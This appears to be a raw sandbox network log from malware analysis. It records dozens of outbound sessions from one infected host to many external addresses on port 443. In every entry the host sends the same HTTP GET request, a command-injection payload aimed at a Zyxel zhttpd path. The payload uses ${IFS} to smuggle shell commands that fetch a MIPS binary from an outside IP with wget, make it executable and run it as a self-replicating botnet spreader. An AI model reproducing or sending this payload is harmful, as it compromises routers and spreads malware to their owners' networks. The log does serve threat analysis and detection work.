                                                        Feb 2, 2024 06:21:28.302411079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8980192.168.2.1445256144.112.98.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302459002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8981192.168.2.145048234.169.74.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302508116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8982192.168.2.145382053.136.210.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302562952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8983192.168.2.145585632.201.31.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302603960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8984192.168.2.1437120168.137.230.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302629948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8985192.168.2.144517879.118.251.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302665949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8986192.168.2.1448204138.43.136.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302725077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8987192.168.2.144104019.22.112.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302769899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8988192.168.2.14445802.33.161.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302798986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8989192.168.2.1454762156.123.217.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302845955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8990192.168.2.144662223.236.88.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302876949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8991192.168.2.143839265.15.57.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302902937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8992192.168.2.144048073.239.239.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302938938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8993192.168.2.1445214181.218.92.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302989006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8994192.168.2.144528888.17.14.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303021908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8995192.168.2.145789867.29.229.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303052902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8996192.168.2.1434624203.160.234.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303102970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8997192.168.2.1441048168.215.67.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303164005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8998192.168.2.1454364136.13.203.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303195953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8999192.168.2.1452532153.111.3.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303231001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9000192.168.2.1452532122.235.192.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303281069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9001192.168.2.1458778165.224.255.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303303957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9002192.168.2.1448820101.234.32.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303337097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9003192.168.2.1435028116.89.23.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303363085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9004192.168.2.1456972180.55.229.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303401947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9005192.168.2.1442902212.128.163.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303430080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9006192.168.2.1454482166.228.138.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303452015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9007192.168.2.143490295.181.59.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303514957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9008192.168.2.1445358153.213.134.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303539991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9009192.168.2.1444444107.102.111.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303560972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9010192.168.2.1447654151.148.246.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303595066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9011192.168.2.1457188118.250.215.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303627014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9012192.168.2.1437652192.151.101.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303657055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9013192.168.2.1458162201.27.166.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303684950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9014192.168.2.1460976112.97.153.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303742886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9015192.168.2.1443720140.230.23.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303776026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9016192.168.2.1435194115.160.15.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303811073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9017192.168.2.1453582191.85.34.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303853035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9018192.168.2.1442354154.28.119.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303889990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9019192.168.2.1434524125.165.51.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303925991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9020192.168.2.1438340143.111.35.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.303946972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9021192.168.2.1448150199.154.186.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304007053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9022192.168.2.1434684213.240.221.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304060936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9023192.168.2.1446770129.106.109.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304092884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9024192.168.2.1442924205.121.221.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304130077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9025192.168.2.143784872.150.121.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304167986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9026192.168.2.1439668184.3.203.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304224968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9027192.168.2.144162431.211.196.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304254055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9028192.168.2.1458644173.209.36.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304291010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9029192.168.2.1442272122.13.27.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304327965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9030192.168.2.1460318186.215.3.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304382086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9031192.168.2.1455626133.32.83.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304413080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9032192.168.2.1460198216.237.143.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304471016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9033192.168.2.1448252107.26.134.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304491043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9034192.168.2.1433894168.169.6.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304538965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9035192.168.2.1446514124.144.94.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304595947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9036192.168.2.1438750167.34.206.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304619074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9037192.168.2.14437162.37.113.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304672956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9038192.168.2.143292266.219.201.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304687977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9039192.168.2.1441844158.144.16.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304724932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9040192.168.2.14567625.65.189.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304759979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9041192.168.2.1441314146.163.117.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304814100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9042192.168.2.1440862113.6.199.5443
                                                        TimestampBytes transferredDirectionData
